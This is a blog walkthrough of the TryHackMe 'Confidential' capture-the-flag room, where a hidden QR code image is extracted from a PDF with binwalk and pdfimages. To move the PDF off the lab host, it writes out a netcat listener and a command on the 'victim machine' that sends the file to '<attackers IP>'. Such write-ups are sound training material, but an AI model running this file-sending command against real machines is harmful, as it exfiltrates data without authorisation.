Confidential — TryHackMe Walkthrough
My name is Krishnadev P Melevila, I am a Bug bounty hunter. To know more about me, Search my name on Google.
I usually post my bug bounty write ups here on my medium blog, But this is the first time that I am posting a TryHackMe room write-up.
So Let’s start,
Room name: Confidential (https://tryhackme.com/room/confidential )
Release date: 19–08–2022
We will get a partial QR code for investigation.(Click on show split view)
If we open that PDF, It is seen that it is partially covered and so we are nto able to scan it.
lets do a binwalk on the PDF.
But I think it is difficult to run binwalk and other tools we needed on the THM Machine. So we can download the PDF to our machine.
To do that, We can make use of a netcat session.
command to be executed on our machine :
nc -lnvp 1234 > sus.pdf
command to be executed on victim machine:
nc <attackers IP> 1234 < Repdf.pdf
Now the nc will download the Repdf.pdf to our machine.
Now we can use a binwalk here:
binwalk sus.pdf
It is messy, So we can check another tool call pdfimages
pdfimages -all sus.pdf ext
Now we will get three images, Let’s Open it.
So we got the actual QR code. So if we scan it using our mobile or using any library (Like opencv), We can read the flag.
Thank you for reading this. Hope you liked it.
Don’t forget to follow me on medium and other social media. Also please give your 50 claps for this write-up and that’s my inspiration to write more!!
I need your support to write more, Buy me a coffee pls: https://www.buymeacoffee.com/krishnadevpm
My Instagram handle: https://instagram.com/krishnadev_p_melevila
My Twitter handle: https://twitter.com/Krishnadev_P_M
My LinkedIn handle: https://www.linkedin.com/in/krishnadevpmelevila/
My Personnel website: http://krishnadevpmelevila.com/
From Infosec Writeups: A lot is coming up in the Infosec every day that it’s hard to keep up with. Join our weekly newsletter to get all the latest Infosec trends in the form of 5 articles, 4 Threads, 3 videos, 2 Github Repos and tools, and 1 job alert for FREE!